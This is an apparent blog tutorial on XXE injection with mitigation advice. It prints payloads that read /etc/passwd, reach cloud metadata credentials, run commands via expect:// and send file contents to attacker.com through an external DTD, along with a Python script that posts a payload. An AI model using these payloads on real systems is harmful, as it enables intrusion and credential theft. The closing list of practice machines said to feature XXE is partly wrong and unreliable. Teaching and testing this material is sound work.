XXE Attacks: Understanding and Exploiting XML External Entity Vulnerabilities

January 15, 2025

by Kieran Jessup

What is XXE?

XML External Entity (XXE) injection is a web security vulnerability that arises when a weakly configured XML parser resolves external entity references in attacker-supplied XML. This vulnerability can lead to:

File Disclosure: Reading sensitive files from the server
Server-Side Request Forgery (SSRF): Making requests to internal services
Remote Code Execution (RCE): In some cases, executing arbitrary code
Denial of Service (DoS): Through entity expansion attacks

How XXE Works

XML External Entity Basics

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

Understanding XXE Vulnerabilities

HIGH SEVERITY

XML External Entity Structure:

XXE attacks leverage the XML DOCTYPE declaration to define external entities that reference external resources. When the XML parser processes these entities, it attempts to fetch the referenced content.

Key Components:

DOCTYPE Declaration: Defines the document type and entities
ENTITY Definition: Creates a reference to an external resource
SYSTEM Keyword: Indicates the entity references an external URI
Entity Reference: &xxe; tells the parser to fetch the external content

Attack Flow:

Attacker sends malicious XML with external entity reference
XML parser processes the DOCTYPE declaration
Parser attempts to fetch the external resource
Content is included in the XML document
Response may contain sensitive data
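
The key components listed above map onto a few lines of string assembly. The following is a minimal sketch, assuming a hypothetical helper named build_xxe_payload (it is not part of any library); it only builds the document text and never sends or parses it:

```python
def build_xxe_payload(system_uri: str, root: str = "foo", entity: str = "xxe") -> str:
    """Assemble a classic in-band XXE test document (hypothetical helper)."""
    if '"' in system_uri:
        # The URI is wrapped in double quotes below, so it must not contain one.
        raise ValueError("system_uri must not contain a double quote")
    return "\n".join([
        '<?xml version="1.0" encoding="ISO-8859-1"?>',
        f"<!DOCTYPE {root} [",                          # DOCTYPE declaration
        f"<!ELEMENT {root} ANY>",
        f'<!ENTITY {entity} SYSTEM "{system_uri}">]>',  # ENTITY definition + SYSTEM keyword
        f"<{root}>&{entity};</{root}>",                 # entity reference in the body
    ])


if __name__ == "__main__":
    print(build_xxe_payload("file:///etc/passwd"))
```

Swapping the URI (for example to an http:// address) is all it takes to move from file disclosure to the SSRF variant described later.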

MITRE ATT&CK: T1190 - Exploit Public-Facing Application
OWASP Top 10: A05:2021 - Security Misconfiguration
CWE: CWE-611 - Improper Restriction of XML External Entity Reference

Common XXE Attack Vectors

1. File Disclosure

The most common XXE attack involves reading sensitive files from the server:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

This payload attempts to read the /etc/passwd file, which contains user account information.

2. SSRF via XXE

XXE can be used to perform Server-Side Request Forgery attacks:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">]>
<foo>&xxe;</foo>

This can help attackers discover and access internal services that aren’t directly accessible from the internet.

3. Out-of-Band (OOB) XXE

When direct file reading isn’t possible, attackers can use OOB techniques:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;]>
<foo>test</foo>

With the external DTD file containing:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%send;
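
To make the two halves of the OOB technique concrete, here is a minimal sketch of the attacker side, assuming two hypothetical helpers: build_external_dtd produces the text of the hosted DTD, and extract_exfil reads the leaked value back out of a logged request target. The parameter name x and the URLs simply mirror the example above.

```python
from typing import Optional
from urllib.parse import parse_qs, quote, urlsplit


def build_external_dtd(target_file: str, callback_url: str) -> str:
    """Return the text of the attacker-hosted DTD (hypothetical helper)."""
    return (
        f'<!ENTITY % file SYSTEM "file://{quote(target_file)}">\n'
        # &#x25; is an escaped "%", so "send" is only declared once %eval; is expanded.
        f"<!ENTITY % eval \"<!ENTITY &#x25; send SYSTEM '{callback_url}?x=%file;'>\">\n"
        "%eval;\n"
        "%send;\n"
    )


def extract_exfil(request_target: str) -> Optional[str]:
    """Pull the leaked value out of a logged request target such as '/?x=...'."""
    values = parse_qs(urlsplit(request_target).query).get("x")
    return values[0] if values else None


if __name__ == "__main__":
    print(build_external_dtd("/etc/passwd", "http://attacker.com/"))
    print(extract_exfil("/?x=root%3Ax%3A0%3A0"))
```

In practice the callback only arrives if the file contents survive being placed in a URL, which is why single-line files tend to work better with this channel than multi-line ones.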

Real-World XXE Example

Let’s examine a practical XXE vulnerability in a web application:

XXE Payload Injection

Request

POST https://vulnerable-app.com/api/process

Headers:

Content-Type: application/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: */*
Content-Length: 156

Body:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<name>&xxe;</name>
<email>test@example.com</email>
</user>

Response

200 OK

Headers:

HTTP/1.1 200 OK
Content-Type: application/json
Server: nginx/1.18.0

Body:

{
"status": "success",
"user": {
  "name": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin",
  "email": "test@example.com"
}
}

Advanced XXE Techniques

1. Parameter Entity Expansion

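Parameter entities (declared with %) are expanded inside the DTD itself, which lets the value of one entity be spliced into the declaration of another. The XML specification forbids parameter entity references inside markup declarations in the internal subset, so the declarations that reference %file; have to be served from an external DTD, as in the OOB example above:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://attacker.com/exfil.dtd">
%dtd;
]>
<data>test</data>

With exfil.dtd containing:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;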

2. XXE in Different Protocols

XXE can exploit various protocols beyond file://:

Protocol Exploitation

# File Protocol
<!ENTITY xxe SYSTEM "file:///etc/passwd">

# HTTP Protocol  
<!ENTITY xxe SYSTEM "http://internal-service/admin">

# FTP Protocol
<!ENTITY xxe SYSTEM "ftp://attacker.com/evil">

# PHP Wrapper
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">

# Data Protocol
<!ENTITY xxe SYSTEM "data://text/plain;base64,PD94bWw+">

XXE Protocol Support

HIGH SEVERITY

Protocol Support in XXE:

Different XML parsers support various protocols for external entity resolution. The supported protocols determine the attack vectors available to attackers.

Common Protocols:

file:// - Read local files (most common)
http:// - Make HTTP requests (SSRF)
ftp:// - FTP protocol support
php:// - PHP stream wrappers
data:// - Data URI scheme
gopher:// - Gopher protocol (rare)

PHP Wrapper Techniques:

PHP applications often support stream wrappers that can be exploited:

Base64 Encoding: php://filter/read=convert.base64-encode/resource=file
Zlib Compression: php://filter/read=zlib.deflate/resource=file
Input Filtering: php://input for POST data processing
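
The base64 filter matters because raw PHP source contains characters such as < and & that would break the XML document the file is inlined into; encoding it first lets the content come back intact. Decoding the leaked value is then a one-liner. A minimal sketch, assuming a hypothetical helper named decode_filter_output:

```python
import base64


def decode_filter_output(leaked: str) -> str:
    """Decode text leaked through php://filter/read=convert.base64-encode."""
    compact = "".join(leaked.split())        # drop line wraps and stray whitespace
    compact += "=" * (-len(compact) % 4)     # restore padding if it was trimmed
    return base64.b64decode(compact).decode("utf-8", errors="replace")


if __name__ == "__main__":
    # The data:// example above carries this same base64 string.
    print(decode_filter_output("PD94bWw+"))
```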

Security Implications:

File disclosure across multiple protocols
Internal network reconnaissance
Bypass of access controls
Data exfiltration via multiple channels

3. XXE in Different File Formats

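XXE isn’t limited to standalone XML files. Many file formats are XML-based or embed XML:

Office Documents: .docx, .xlsx, .pptx (ZIP containers of XML parts)
PDF Files: XML can be embedded (for example XMP metadata), and some PDF parsers process it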
SVG Images: Scalable Vector Graphics
SOAP APIs: Web services using XML
RSS Feeds: Really Simple Syndication
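
Because Office documents are ZIP archives full of XML parts, an upload handler can inspect them before any XML parser sees them. The following is a rough sketch using only the standard library; find_doctype_parts is a hypothetical helper, and the byte-level search is an assumption that works for UTF-8 parts but would miss UTF-16 encoded ones:

```python
import io
import re
import zipfile
from typing import List

# DOCTYPE and ENTITY are case-sensitive keywords in XML.
DECL_RE = re.compile(rb"<!DOCTYPE|<!ENTITY")


def find_doctype_parts(container: bytes) -> List[str]:
    """List XML parts inside a ZIP-based document that declare a DOCTYPE or ENTITY."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(container)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue  # skip images, fonts and other binary parts
            if DECL_RE.search(archive.read(name)):
                flagged.append(name)
    return flagged
```

Legitimate Office files do not normally need a DOCTYPE, so any hit is worth rejecting or at least logging.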

Detection and Exploitation

1. Identifying XXE Vulnerabilities

XXE Detection Methods

# 1. Look for XML Processing
- SOAP APIs
- REST APIs accepting XML
- File upload functionality
- Document processing

# 2. Test with Simple Payload
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<test>&xxe;</test>

# 3. Monitor for Outbound Requests
- Check server logs
- Monitor network traffic
- Use Burp Collaborator

# 4. Error-Based Detection
- Look for XML parsing errors
- Check for file path disclosures
- Monitor for timeout responses

Finding XXE Vulnerabilities

MEDIUM SEVERITY

XXE Detection Strategy:

Identifying XXE vulnerabilities requires a systematic approach to find XML processing endpoints and test their security.

Common Entry Points:

API Endpoints: REST/SOAP services accepting XML
File Uploads: Document processing applications
Form Submissions: Web forms that process XML data
Import Features: Data import functionality
Search Functions: Advanced search with XML queries

Testing Methodology:

Reconnaissance: Identify XML processing endpoints
Basic Testing: Send simple XXE payloads
Error Analysis: Monitor for parsing errors
Outbound Testing: Use OOB techniques
Protocol Testing: Test different URI schemes

Indicators of Vulnerability:

XML parsing errors in responses
File content appearing in responses
Outbound HTTP requests to attacker servers
Timeout responses indicating processing delays
Error messages revealing file paths
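
Some of these indicators can be checked automatically when triaging responses. A minimal sketch follows, assuming a hypothetical xxe_indicators helper; the error markers are only examples of strings that common parsers emit, not an exhaustive list:

```python
import re
from typing import List

# Matches passwd-style records such as "root:x:0:0:" anywhere in the body.
PASSWD_RECORD = re.compile(r"\b[a-z_][a-z0-9_-]*:[^:\s]*:\d+:\d+:")

# Example markers only (assumed); extend for the stack under test.
PARSER_ERROR_MARKERS = (
    "DOCTYPE is disallowed",
    "SAXParseException",
    "XMLSyntaxError",
)


def xxe_indicators(body: str) -> List[str]:
    """Return the names of XXE indicators found in a response body."""
    found = []
    if PASSWD_RECORD.search(body):
        found.append("passwd-like content")
    if any(marker in body for marker in PARSER_ERROR_MARKERS):
        found.append("XML parser error")
    return found
```

A hit is a lead to verify by hand rather than proof; out-of-band callbacks and timing still need separate monitoring.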

2. Automated XXE Testing

Several tools can help automate XXE detection:

# OWASP ZAP
zap-cli quick-scan --self-contained --start-options "-config api.disablekey=true" https://target.com

# Burp Suite Professional
# Use the XXE Scanner extension

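# Custom Python Script
import requests

# Classic in-band payload: a vulnerable parser inlines /etc/passwd where &xxe; appears
xxe_payload = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>'''

# Only run this against systems you are authorized to test
response = requests.post('https://target.com/api/process',
                        data=xxe_payload,
                        headers={'Content-Type': 'application/xml'},
                        timeout=10)  # avoid hanging on slow or filtered endpoints
# A vulnerable endpoint typically echoes file content such as a line starting with "root:"
print(response.text)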

Mitigation Strategies

1. Disable External Entity Processing

The most effective mitigation is to disable external entity processing entirely:

Java (SAX Parser):

SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Python (lxml):

from lxml import etree
parser = etree.XMLParser(resolve_entities=False)
tree = etree.parse(xml_file, parser)

PHP:

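// Needed only before PHP 8.0 (deprecated there: libxml >= 2.9.0 does not load external entities unless LIBXML_NOENT is passed)
libxml_disable_entity_loader(true);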

2. Input Validation and Sanitization

XXE Mitigation Techniques

# 1. Disable DOCTYPE Processing
- Set disallow-doctype-decl feature
- Disable external entity resolution
- Use secure XML parsers

# 2. Input Validation
- Whitelist allowed XML elements
- Block DOCTYPE declarations
- Validate XML structure

# 3. Output Encoding
- Encode XML output
- Sanitize user input
- Build XML with a serializer rather than string concatenation

# 4. Network Security
- Block outbound requests
- Use firewalls
- Monitor network traffic

# 5. Security Headers (general hardening only; browser-side headers do not stop server-side XXE)
- Content Security Policy
- X-Content-Type-Options
- X-Frame-Options

Preventing XXE Attacks

LOW SEVERITY

Comprehensive XXE Mitigation:

Preventing XXE attacks requires a multi-layered approach combining technical controls, input validation, and security monitoring.

Technical Controls:

Parser Configuration: Disable external entity processing
Feature Flags: Use secure XML parser features
Library Updates: Keep XML libraries updated
Alternative Parsers: Use XXE-resistant parsers

Input Validation:

Schema Validation: Use XML Schema (XSD) validation
Content Filtering: Block DOCTYPE declarations
Element Whitelisting: Only allow expected XML elements
Size Limits: Restrict XML document size
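
Blocking DOCTYPE declarations is the simplest of these checks to implement, since an XXE payload cannot define an entity without one. The sketch below uses the standard library's expat bindings and aborts parsing as soon as a DOCTYPE starts; reject_doctype and DoctypeForbidden are hypothetical names chosen for illustration:

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an XML document contains a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Parse xml_bytes and raise DoctypeForbidden if a DOCTYPE is present.

    Malformed XML still raises xml.parsers.expat.ExpatError as usual.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Raising here stops the parse before any entity is declared or used.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)
```

Running this as a gate in front of the real parser costs one extra pass over the document, which is usually acceptable given the size limits above.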

Network Security:

Outbound Filtering: Block external requests from servers
Firewall Rules: Restrict network access
Monitoring: Log and alert on suspicious requests
Segmentation: Isolate XML processing services
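
Outbound filtering usually lives in firewalls or proxies, but the decision it makes is easy to illustrate. This is a minimal sketch, assuming a hypothetical classify_target helper that looks only at IP literals; a real filter would also have to resolve hostnames and re-check the resulting addresses:

```python
import ipaddress
from urllib.parse import urlsplit


def classify_target(url: str) -> str:
    """Classify a URL as 'internal', 'external', 'needs-dns' or 'no-host'."""
    host = urlsplit(url).hostname
    if host is None:
        return "no-host"            # e.g. file:///etc/passwd
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "needs-dns"          # a hostname: resolve it before deciding
    if addr.is_private or addr.is_loopback or addr.is_link_local:
        return "internal"           # includes 169.254.169.254 (link-local)
    return "external"
```

For a service whose only job is parsing XML, the safest policy is to deny all three network categories and allow outbound traffic only to an explicit list of hosts.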

Security Best Practices:

Principle of Least Privilege: Minimize server permissions
Regular Audits: Test for XXE vulnerabilities
Security Training: Educate developers about XXE
Incident Response: Have a plan for XXE incidents

3. Secure XML Processing Libraries

Use XXE-resistant XML processing libraries:

Java:

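// JAXB is not XXE-safe by itself on every runtime: unmarshal from a hardened StAX reader
XMLInputFactory xif = XMLInputFactory.newFactory();
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
Unmarshaller unmarshaller = JAXBContext.newInstance(MyClass.class).createUnmarshaller();
Object result = unmarshaller.unmarshal(xif.createXMLStreamReader(inputStream)); // inputStream: the untrusted XML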

Python:

# Use defusedxml instead of standard library
from defusedxml import ElementTree
tree = ElementTree.parse(xml_file)

Node.js:

// xml2js builds on sax-js, which does not resolve external entities; the options below only shape the output
const xml2js = require('xml2js');
const parser = new xml2js.Parser({
  explicitArray: false,
  ignoreAttrs: true,
  explicitRoot: false
});

Real-World XXE Examples

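1. Apache Flex BlazeDS XXE (CVE-2015-3269)

Apache Flex BlazeDS, as shipped in Adobe LiveCycle Data Services, had an XXE vulnerability in its AMF message handling that allowed attackers to read files from the server. The payload below is an illustrative entity declaration in an Adobe-style policy file, not the original exploit: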

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
&xxe;
</cross-domain-policy>

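2. WordPress XML-RPC (CVE-2017-9062)

CVE-2017-9062 covers improper handling of post meta data values in the WordPress XML-RPC API (fixed in 4.7.5) rather than an XXE flaw as such. XML-RPC endpoints are still a natural place to test for XXE, and an illustrative payload against one looks like this: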

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>&file;</value></param>
</params>
</methodCall>

XXE in Modern Applications

1. API Security

Modern REST APIs often process XML data and may be vulnerable to XXE:

API XXE Example

Request

POST https://api.example.com/v1/users

Headers:

Content-Type: application/xml
Authorization: Bearer token123
Accept: application/json

Body:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<name>&xxe;</name>
<email>test@example.com</email>
</user>

Response

200 OK

Headers:

HTTP/1.1 200 OK
Content-Type: application/json
Server: nginx

Body:

{
"id": 123,
"name": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin",
"email": "test@example.com",
"created_at": "2025-01-15T10:30:00Z"
}

2. Cloud Services

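Cloud workloads may also be vulnerable to XXE. On an EC2 instance that still allows IMDSv1, an external entity can reach the instance metadata service and list the attached IAM role (Lambda functions have no such endpoint; their credentials live in environment variables):

<?xml version="1.0" encoding="UTF-8"?>
<!-- AWS EC2 instance metadata (IMDSv1) example -->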
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]>
<data>&xxe;</data>

Advanced XXE Exploitation

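1. Blind XXE

When the response never reflects the entity value, blind XXE techniques send the data to an attacker-controlled server instead. Because parameter entity references are not allowed inside markup declarations in the internal subset, the exfiltration declarations are loaded from an external DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://attacker.com/exfil.dtd">
%dtd;
]>
<data>test</data>

With exfil.dtd containing:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;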

2. XXE for RCE

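In some cases, XXE can lead to remote code execution. The best-known route requires a PHP application with the expect extension loaded, which exposes the expect:// wrapper: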

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "expect://id">]>
<data>&xxe;</data>

Tools and Resources

1. XXE Testing Tools

Burp Suite Professional: Built-in XXE scanner
OWASP ZAP: Free XXE detection
XXEinjector: Ruby-based XXE testing tool
XXE-Out-of-Band: OOB XXE exploitation tool

2. Payload Repositories

PayloadsAllTheThings: Comprehensive XXE payloads
OWASP XXE Cheat Sheet: Official OWASP guidance
HackTricks XXE: Practical exploitation techniques

3. Learning Resources

PortSwigger XXE Lab: Interactive XXE training
OWASP WebGoat: XXE vulnerability training
HackTheBox: XXE challenge machines

Conclusion

XXE attacks remain a significant threat to web applications that process XML data. Understanding the vulnerability, exploitation techniques, and mitigation strategies is crucial for security professionals and developers.

Key takeaways:

XXE is still prevalent in modern applications despite being well-known
Multiple attack vectors exist beyond simple file reading
Comprehensive mitigation requires technical controls and security practices
Regular testing is essential to detect XXE vulnerabilities
Security awareness among developers is crucial for prevention

By implementing proper security controls, using secure XML parsers, and maintaining security awareness, organizations can effectively protect against XXE attacks and maintain the security of their applications.

References

📚 Official Documentation

OWASP XXE Prevention Cheat Sheet - Comprehensive mitigation guide
CWE-611: Improper Restriction of XML External Entity Reference - Official vulnerability classification
MITRE ATT&CK: T1190 - Exploit Public-Facing Application - Attack technique framework

🔬 Learning Resources

PortSwigger XXE Lab - Interactive XXE training environment
PayloadsAllTheThings XXE - Comprehensive payload collection
HackTricks XXE Guide - Practical exploitation techniques

🛠️ Tools & Testing

XXEinjector - Automated XXE testing tool
XXE-Out-of-Band - OOB XXE exploitation framework
OWASP ZAP - Free web application security scanner

📖 Additional Reading

OWASP WSTG: XML External Entity Testing - Testing methodology
OWASP XXE Processing - Detailed vulnerability information
OWASP XXE Prevention - Prevention strategies and best practices

Related Boxes

If you found this XXE guide helpful, you might also be interested in these related posts from my blog:

Practical XXE Examples:

HTB - BountyHunter - Real-world XXE exploitation walkthrough with file disclosure and privilege escalation

Learning Path:

Start with: PortSwigger XXE Lab - Interactive XXE training environment
Practice on: HTB - BountyHunter - See XXE in action with a complete walkthrough
Advanced: Apply these techniques to your own testing and bug bounty programs

External HTB Machines with XXE:

For additional practice, consider these HackTheBox machines that feature XXE vulnerabilities:

HTB - DevVortex - Features XXE in a web application with file disclosure
HTB - Pandora - Includes XXE exploitation in a monitoring system
HTB - Validation - Web application with XXE and SSRF vectors
HTB - Backend - API-based XXE exploitation
HTB - Interface - Modern web application with XXE vulnerabilities
